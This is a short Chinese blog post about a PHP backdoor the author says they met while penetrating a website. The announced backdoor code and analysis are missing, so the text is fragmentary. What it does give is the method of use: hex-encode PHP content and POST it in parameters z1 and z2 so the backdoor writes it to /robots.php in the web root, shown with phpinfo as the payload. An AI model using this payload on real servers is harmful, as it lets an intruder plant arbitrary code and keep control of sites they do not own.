又一款超强PHP后门
- 发表于
- 周边
这个后门是在渗透某站时遇到的,贴代码:
下面分析一下这个代码
另外给出此后门的利用方式:
先把要写入的内容URL编码,比如:
编码后:
%3C%3F%70%68%70%20%70%68%70%69%6E%66%6F%28%29%3B%20%3F%3E
然后去掉里面的百分号(%)得到:
3C3F70687020706870696E666F28293B203F3E
然后给后门POST内容:
z1=/robots.php&z2=3C3F70687020706870696E666F28293B203F3E
可以看到phpinfo已经写入到根目录下的robots.php:
原文连接:又一款超强PHP后门
所有媒体,可在保留署名、
原文连接
的情况下转载,若非则不得使用我方内容。